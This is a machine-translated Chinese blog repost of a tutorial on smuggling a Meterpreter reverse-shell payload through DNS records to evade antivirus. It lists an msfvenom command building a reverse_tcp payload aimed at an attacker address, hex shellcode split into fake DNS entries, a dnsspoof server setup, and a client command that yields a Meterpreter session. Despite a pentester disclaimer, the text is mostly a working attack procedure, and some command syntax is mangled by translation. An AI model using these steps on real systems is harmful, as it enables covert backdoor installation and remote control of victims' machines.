版權聲明:轉載請注明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319 傳送門
注意标點符号,必須是英文的。
通過DNS流量和繞過防病毒傳輸的後門有效負載的C#代碼
由Damon Mohammadbagher發表
警告:此代碼釋出用于解釋針對Pentesters和安全研究人員的反病毒漏洞
欲了解更多資訊,請一步一步通路以下連結:
通過DNS流量繞過帶有傳輸後門有效負載的反病毒或
文章備份位址視訊由Damon Mohammadbagher發行(bbxc9x00x1f)
繞過反病毒與DNS流量傳輸後門有效負載
視訊(需要通路YouTube)
用NativePayload_DNS和Meterpreter_Payload_Detection繞過AV
視訊說明:使用NativePayload_DNS.exe繞過AV并通過Meterpreter_Payload_Detection工具檢測Meterpreter程序
步驟1:
msfvenom C類型的有效負載在你的kali linux
msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt
将有效載荷從payload.txt檔案複制到dns.txt,格式如下:
root @ kali:〜#cat /root/Desktop/dns.txt
1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”
1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”
1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”
1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”
步驟2:在您的kali linux中制作假DNS伺服器
root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt
步驟3:
在用戶端運作代碼
文法:
NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”
最後你可以繞過AV,你有Meterpreter Session
通過DNS流量繞過帶有傳輸後門有效負載的反病毒,備份位址相關工具:
用于通過IPv6位址(AAAA)記錄和DNS流量傳輸的Backdoor Payload的C#代碼也繞過防病毒相關連結:
用C#通過加密有效載荷繞過所有防病毒